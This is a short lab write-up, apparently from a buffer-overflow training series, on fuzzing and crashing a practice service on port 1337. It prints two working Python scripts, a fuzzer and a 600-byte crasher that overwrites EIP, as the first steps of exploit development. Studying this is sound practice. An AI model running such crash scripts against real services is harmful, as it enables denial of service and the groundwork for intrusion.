Crashing the Application
In order to exploit the target application, we need to crash the application and be able to overwrite the EIP with our own values.
This step can be skipped for some applications as we already know the buffer size that causes the crash.
#!/usr/bin/env python3
import socket, time, sys
ip = "windows.box"
port = 1337
timeout = 5
prefix = "OVERFLOW10 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
python3 fuzzer.py
The fuzzer tells us that the program crashed when
600 byteswas sent in as the buffer size. We also notice that the EIP has been overwritten with \x41.This step can be used to verify the value from the fuzzing process.
#!/usr/bin/python
import socket
try:
print ("\nSending evil buffer...")
prefix = "OVERFLOW10 "
buffer = prefix + "A" * 600
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("windows.box", 1337))
s.send(buffer)
s.close()
print ("\nDone!")
except:
print ("\nCould not connect!")
python crasher.py
Once
Crasher.py is ran, notice that the target application crashes and the EIP is overwritten with \x41. This confirms that 600 bytes is indeed the buffer size that causes the target application to crash.Last modified 2yr ago